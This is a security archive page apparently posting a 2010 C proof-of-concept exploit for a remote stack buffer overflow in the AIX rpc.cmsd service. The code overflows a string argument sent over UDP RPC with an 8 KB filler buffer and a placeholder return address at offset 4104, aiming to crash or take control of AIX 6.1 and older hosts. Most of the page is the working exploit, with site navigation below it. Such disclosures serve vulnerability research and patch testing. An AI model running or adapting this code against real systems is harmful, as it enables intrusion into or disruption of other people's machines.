AIX RPC.cmsd Remote Buffer Overflow

AIX RPC.cmsd Remote Buffer Overflow: Posted Feb 3, 2010; Authored by Rodrigo Rubira Branco; AIX RPC.cmsd remote stack buffer overflow proof of concept exploit.; tags | exploit, remote, overflow, proof of concept; systems | aix; SHA-256 | 7c8e41a206c1c2240e87d6853f2c71873a26177a618a781f20802d31ab305649; Download | Favorite | View

AIX RPC.cmsd Remote Buffer Overflow

/*
 * Rodrigo Rubira Branco (BSDaemon) - < rodrigo *noSPAM* risesecurity . org >
 * http://www.kernelhacking.com/rodrigo
 * http://www.risesecurity.org
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>

#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_CREATE 21


struct cm_send {
   char *s1;
   char *s2;
};

struct cm_reply {
   int i;
};

bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
   if(!xdr_wrapstring(xdrs, &objp->s1))
      return (FALSE);
   if(!xdr_wrapstring(xdrs, &objp->s2))
       return (FALSE);

   return (TRUE);
}

bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
   if(!xdr_int(xdrs, &objp->i))
      return (FALSE);
   return (TRUE);
}

int
main(int argc, char *argv[])
{
   char buffer[8192];
   long ret, offset;
   int len, x, y, i;
   char *hostname, *b;

   CLIENT *cl;
   struct cm_send send;
   struct cm_reply reply;
   struct timeval tm = { 10, 0 };
   enum clnt_stat stat;

   if(argc < 2) {
      printf("<< RPC.cmsd remote PoC for AIX 6.1 and lower! >>\n");
      printf("<< Rodrigo Rubira Branco (BSDaemon) - <rodrigo *noSPAM* kernelhacking .com> >>\n");
      printf("<< http://www.kernelhacking.com/rodrigo >>\n");
      printf("<< http://www.risesecurity.org >>\n");
      printf("Usage: %s [hostname]\n", argv[0]);
      exit(1);
   }

   hostname = argv[1];

   memset(buffer,0x60,sizeof(buffer)-1);
   memcpy(buffer+4104,"\xde\xad\xbe\xef",4); //0x20034748 heap

   send.s1 = buffer;
   send.s2 = "";

   printf("Calling vulnerable procedure ... ");

   cl = clnt_create(hostname, CMSD_PROG, CMSD_VERS, "udp");
   if(cl == NULL) {
      clnt_pcreateerror("clnt_create");
      printf("exploit failed; unable to contact RPC server\n");
      exit(1);
   }

   cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
   stat = clnt_call(cl, CMSD_CREATE, xdr_cm_send, (caddr_t) &send,
                        xdr_cm_reply, (caddr_t) &reply, tm);

   if(stat == RPC_SUCCESS) {
      printf("not vuln!!\n");
      clnt_destroy(cl);
      exit(1);
   } else {
      printf("done!\n");
      clnt_destroy(cl);
      exit(0);
   }
}

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 85 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Debian 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

AIX RPC.cmsd Remote Buffer Overflow

AIX RPC.cmsd Remote Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

AIX RPC.cmsd Remote Buffer Overflow

Share This

AIX RPC.cmsd Remote Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems